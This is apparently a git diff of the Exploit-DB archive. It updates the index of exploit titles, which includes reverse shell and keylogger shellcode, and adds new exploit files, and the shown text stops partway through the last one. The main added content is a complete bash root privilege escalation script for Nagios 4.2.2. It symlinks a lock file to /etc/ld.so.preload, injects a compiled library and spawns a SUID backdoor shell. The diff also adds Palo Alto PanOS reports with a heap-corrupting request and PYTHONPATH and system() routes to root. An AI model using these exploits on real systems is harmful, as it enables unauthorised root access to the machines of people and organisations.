(Metasploit)",2013-09-23,Metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution (Metasploit)",2013-09-23,Metasploit,hardware,remote,0 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote,0 @@ -13505,7 +13514,7 @@ id,file,description,date,author,platform,type,port 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,multiple,remote,0 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,windows,remote,0 -28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0 +28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,windows,remote,0 28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 28987,platforms/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote,0 29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0 @@ -13611,8 +13620,8 @@ id,file,description,date,author,platform,type,port 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 29853,platforms/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 -29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)",2013-11-27,Metasploit,windows,remote,0 -29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)",2013-11-27,Metasploit,windows,remote,0 +29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)",2013-11-27,Metasploit,windows,remote,0 +29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)",2013-11-27,Metasploit,windows,remote,0 29859,platforms/java/remote/29859.rb,"Apache Roller - OGNL Injection (Metasploit)",2013-11-27,Metasploit,java,remote,8080 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0 29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 @@ -13943,7 +13952,7 @@ id,file,description,date,author,platform,type,port 32382,platforms/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",multiple,remote,0 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta",windows,remote,0 32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 - ActiveX Control 'CanUninstall()' Buffer Overflow",2008-09-27,Satan_HackerS,windows,remote,0 -32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,Metasploit,windows,remote,0 +32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)",2014-03-22,Metasploit,windows,remote,0 32439,platforms/php/remote/32439.rb,"Horde Framework - Unserialize PHP Code Execution (Metasploit)",2014-03-22,Metasploit,php,remote,80 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation / Code Execution (Metasploit)",2014-03-22,Metasploit,hardware,remote,22 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 @@ -14010,7 +14019,7 @@ id,file,description,date,author,platform,type,port 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 -32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)",2014-04-16,Metasploit,windows,remote,0 +32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)",2014-04-16,Metasploit,windows,remote,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote,0 @@ -14769,7 +14778,7 @@ id,file,description,date,author,platform,type,port 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0 -38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL Exploit (MS15-100)",2015-09-15,Metasploit,windows,remote,0 +38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL Exploit (MS15-100) (Metasploit)",2015-09-15,Metasploit,windows,remote,0 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80 38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 38221,platforms/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution (Metasploit)",2015-09-17,Metasploit,java,remote,0 @@ -14888,17 +14897,17 @@ id,file,description,date,author,platform,type,port 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 -38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 +38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0 -38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 +38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80 38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,multiple,remote,8080 38910,platforms/windows/remote/38910.txt,"Hancom Office - '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,windows,remote,0 38911,platforms/windows/remote/38911.txt,"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File",2015-12-09,"Eduardo Braun Prado",windows,remote,0 -38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 +38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)",2015-12-09,"Core Security",windows,remote,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0 39097,platforms/linux/remote/39097.txt,"RedHat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 @@ -14985,7 +14994,7 @@ id,file,description,date,author,platform,type,port 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x - C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 -39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock)",2016-06-10,Metasploit,cgi,remote,444 +39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,multiple,remote,8080 40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0 39945,platforms/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,linux,remote,8080 @@ -15036,7 +15045,7 @@ id,file,description,date,author,platform,type,port 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0 40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0 40507,platforms/linux/remote/40507.py,"Subversion 1.6.6 / 1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote,0 -40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0 +40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,multiple,remote,0 40589,platforms/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099 @@ -15071,6 +15080,7 @@ id,file,description,date,author,platform,type,port 40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0 +40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15668,6 +15678,7 @@ id,file,description,date,author,platform,type,port 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 +40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -24913,7 +24924,7 @@ id,file,description,date,author,platform,type,port 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18042,platforms/php/webapps/18042.txt,"Joomla! Component 'com_techfolio' 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 -18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)",2011-10-25,Metasploit,php,webapps,0 +18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 @@ -24993,7 +25004,7 @@ id,file,description,date,author,platform,type,port 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post Cross-Site Request Forgery",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq 2.3 - Authentication Bypass / Remote Code Execution (Metasploit)",2011-12-13,Metasploit,php,webapps,0 -18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2)",2011-12-14,Metasploit,php,webapps,0 +18243,platforms/php/webapps/18243.rb,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit)",2011-12-14,Metasploit,php,webapps,0 18246,platforms/php/webapps/18246.txt,"Seotoaster - SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0 @@ -36777,3 +36788,6 @@ id,file,description,date,author,platform,type,port 40756,platforms/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,php,webapps,0 40771,platforms/php/webapps/40771.txt,"Wordpress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 40772,platforms/php/webapps/40772.txt,"Wordpress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",php,webapps,0 +40782,platforms/php/webapps/40782.txt,"Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 +40783,platforms/php/webapps/40783.txt,"Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",php,webapps,0 +40776,platforms/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,php,webapps,0 diff --git a/platforms/linux/dos/40790.txt b/platforms/linux/dos/40790.txt new file mode 100755 index 000000000..998746507 --- /dev/null +++ b/platforms/linux/dos/40790.txt @@ -0,0 +1,53 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908 +Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68 + +PanOS uses a modified version of the appweb3 embedded webserver, it's used for +a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa: + +char *mprItoa(char *buf, int size, int64 value, int radix); + +https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463 + +The size parameter is documented to be the size of the buffer at *buf, but if +the value exceeds that it will write one more byte than that as a nul +terminator. + +Note that appweb3 has been EOL since 2012 and no longer receives security +updates and is not supported by the developer, so security maintenance is the +responsibility of Palo Alto Networks. It seems crazy to ship a EOL web server, +but whatever. + +I've found an unauthenticated php script that an attacker call force to invoke +mprItoa() on a default installation at /unauth/php/errorPage.php, it can be +called like so: + +/unauth/php/errorPage.php?code=1e16 + +This example should corrupt the stored GOT pointer, resulting in some +unexpected routine being called on the attacker-controlled MaResponse object, +and crashing with some heap corruption. + +*** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 *** +======= Backtrace: ========= +/lib/libc.so.6[0xf7ee8786] +/lib/libc.so.6(cfree+0x59)[0xf7ee8bb9] +/usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58] +/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b] +/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8] +/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438] +/usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497] +/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d] +/usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f] +/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74] +/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd] +/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c] +/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f] +/usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296] +/lib/libpthread.so.0[0xf6e9b6e1] +/lib/libc.so.6(clone+0x5e)[0xf7f52aee] +======= Memory map: ======== +08048000-0804c000 rwxp 00000000 08:02 67709 /usr/local/bin/appweb3 +0804c000-095e5000 rwxp 00000000 00:00 0 [heap] +f1c00000-f1cd0000 rwxp 00000000 00:00 0 + +etc. diff --git a/platforms/linux/local/40774.sh b/platforms/linux/local/40774.sh new file mode 100755 index 000000000..5299bdbf5 --- /dev/null +++ b/platforms/linux/local/40774.sh @@ -0,0 +1,192 @@ +Affected Product: Nagios 4 +Vulnerability Type: root privilege escalation +Fixed in Version: N/A +Vendor Website: https://www.nagios.com/ +Software Link: : https://sourceforge.net/projects/nagios/files/latest/download?source=directory-featured +Affected Version: 4.2.2 and prior +Tested on: Ubuntu +Remote Exploitable: No +Reported to vendor: 8 november 2016 +Disclosed to public: +Release mode: Responsible Disclosure +CVE-2016-8641 Nagios 4.2.2 - root privilege escalation +Credits: Vincent Malguy + + +Description (from wikipedia) : +Nagios /ˈnɑːɡiːoʊs/, now known as Nagios Core, is a free and open source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved. + +********************* CVE-2016-8641 Nagios 4.2.2 - root privilege escalation ********************* +Using official installation instruction at https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/4/en/quickstart-ubuntu.html, +nagios' user is create with a shell : + +Create a new nagios user account and give it a password. +/usr/sbin/useradd -m -s /bin/bash nagios + +leading to a entry in /etc/passwd like this "nagios:x:1001:1001::/home/nagios:/bin/bash" + +This means that if someone has access to the nagios account, he can access any files own by nagios. + +The Nagios startup script, run by root, is insecurely giving owner of file to nagios use : +(/etc/init.d/nagios: line 190) +touch $NagiosRunFile +chown $NagiosUser:$NagiosGroup $NagiosRunFile $NagiosVarDir/nagios.log $NagiosRetentionFile + +If Nagios user symlink $NagiosRunFile to a file that he has no access to, at startup or reboot of the nagios daemon, the init script with give him ownership of the linked file. + + +Exploit : +#!/bin/bash -p +# + + + +TARGETSERVICE="Nagios" +LOWUSER="nagios" +TARGETPATH="/usr/local/nagios/var/nagios.lock" + +BACKDOORSH="/bin/bash" +BACKDOORPATH="/tmp/rootbackdoor" +PRIVESCLIB="/tmp/privesclib.so" +PRIVESCSRC="/tmp/privesclib.c" +SUIDBIN="/usr/bin/sudo" + +function cleanexit { +# Cleanup +echo -e "\n[+] Cleaning up..." +rm -f $PRIVESCSRC +rm -f $PRIVESCLIB +rm -f $TARGETPATH +touch $TARGETPATH +if [ -f /etc/ld.so.preload ]; then +echo -n > /etc/ld.so.preload +fi +echo -e "\n[+] Job done. Exiting with code $1 \n" +exit $1 +} + +function ctrl_c() { + echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." +cleanexit 0 +} + +#intro +echo -e "\033[94m \nNagios - Root Privilege Escalation PoC Exploit \nNagios-chowned.sh (ver. 1.0)\n\nCVE-2016-XXXX \n" +echo -e "Discovered by: Vincent Malguy\n Original exploit code borrow from Dawid Golunski http://legalhackers.com (Thanks!)\033[0m" + + +# Priv check + +echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" +id | grep -q ${LOWUSER} +if [ $? -ne 0 ]; then +echo -e "\n[!] You need to execute the exploit as ${LOWUSER} user! Exiting.\n" +exit 3 +fi + + +echo -e "\n[+] Target ${LOWUSER} file set to $TARGETPATH " + +# [ Active exploitation ] + +trap ctrl_c INT +# Compile privesc preload library +echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" +cat <<_solibeof_>$PRIVESCSRC +#define _GNU_SOURCE +#include +#include +#include +#include + #include + #include + #include + +uid_t geteuid(void) { +static uid_t (*old_geteuid)(); +old_geteuid = dlsym(RTLD_NEXT, "geteuid"); +if ( old_geteuid() == 0 ) { +chown("$BACKDOORPATH", 0, 0); +chmod("$BACKDOORPATH", 04777); +//unlink("/etc/ld.so.preload"); +} +return old_geteuid(); +} +_solibeof_ +/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" +if [ $? -ne 0 ]; then +echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." +cleanexit 2; +fi + + +# Prepare backdoor shell +cp $BACKDOORSH $BACKDOORPATH +echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" + +# Safety check +if [ -f /etc/ld.so.preload ]; then +echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." +exit 2 +fi + +# Symlink the log file to /etc +rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH +if [ $? -ne 0 ]; then +echo -e "\n[!] Couldn't remove the $TARGETPATH file or create a symlink." +cleanexit 3 +fi +echo -e "\n[+] Symlink created at: \n`ls -l $TARGETPATH`" + +# Kill target service if possible +#echo -ne "\n[+] Killing ${TARGETSERVICE}...\n" +#killall ${TARGETSERVICE} + + + +# Wait for target service startup to re-create target file +echo -ne "\n[+] Waiting for ${TARGETSERVICE} startup to re-create the ${TARGETPATH}...\n" + +while :; do +# if target file can be recreated by target process (like logs files), we need to keep remove and link it +rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH +sleep 0.1 +if [ -f /etc/ld.so.preload ]; then +echo $PRIVESCLIB > /etc/ld.so.preload +rm -f $TARGETPATH +break; +fi +done + +# /etc/ld.so.preload dir should be owned by our low priv controled user at this point +# Inject the privesc.so shared library to escalate privileges +echo $PRIVESCLIB > /etc/ld.so.preload +echo -e "\n[+] ${TARGETSERVICE} restarted. The /etc/ld.so.preload file got created with ${LOWUSER} privileges: \n`ls -l /etc/ld.so.preload`" +echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" +echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" +chmod 755 /etc/ld.so.preload + +# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) +echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" +sudo 2>/dev/null >/dev/null + + +# Check for the rootshell +ls -l $BACKDOORPATH +ls -l $BACKDOORPATH | grep rws | grep -q root +if [ $? -eq 0 ]; then +echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" +echo -e "\n\033[94mGot root! The ${TARGETSERVICE} server has been ch-OWNED !\033[0m" +else +echo -e "\n[!] Failed to get root" +cleanexit 2 +fi + + +# Execute the rootshell +echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" +$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" +$BACKDOORPATH -p + +# Job done. +cleanexit 0 diff --git a/platforms/linux/local/40788.txt b/platforms/linux/local/40788.txt new file mode 100755 index 000000000..4c9a23b66 --- /dev/null +++ b/platforms/linux/local/40788.txt @@ -0,0 +1,20 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912 + +The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script: + +$ ls -l /usr/local/bin/root_trace +-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace + +As the environment is not scrubbed, you can just do something like this: + +$ cat /tmp/sysd.py +import os +os.system("id") +os._exit(0); + +$ PYTHONPATH=/tmp root_trace +uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin) + +This was fixed by PAN: + +http://securityadvisories.paloaltonetworks.com/Home/Detail/67 \ No newline at end of file diff --git a/platforms/linux/local/40789.txt b/platforms/linux/local/40789.txt new file mode 100755 index 000000000..417a9343a --- /dev/null +++ b/platforms/linux/local/40789.txt @@ -0,0 +1,44 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913 +This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67 + +The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one: + +.text:0804870F C7 44 24 04 78+ mov dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "... +.text:08048717 89 04 24 mov [esp], eax ; char ** +.text:0804871A E8 0D FE FF FF call _asprintf +.text:0804871F 8B 45 E8 mov eax, [ebp+new] +.text:08048722 85 C0 test eax, eax +.text:08048724 0F 84 B9 01 00+ jz loc_80488E3 +.text:0804872A 89 04 24 mov [esp], eax ; command +.text:0804872D E8 9A FD FF FF call _system + +Which is trying to do this: + + if (setuid(0) < 0) + { + fprintf(stderr, "%s: Can't setuid to reboot system\n"); + } + if (reason) { + asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason); + system(new); + free(new); + } + +This 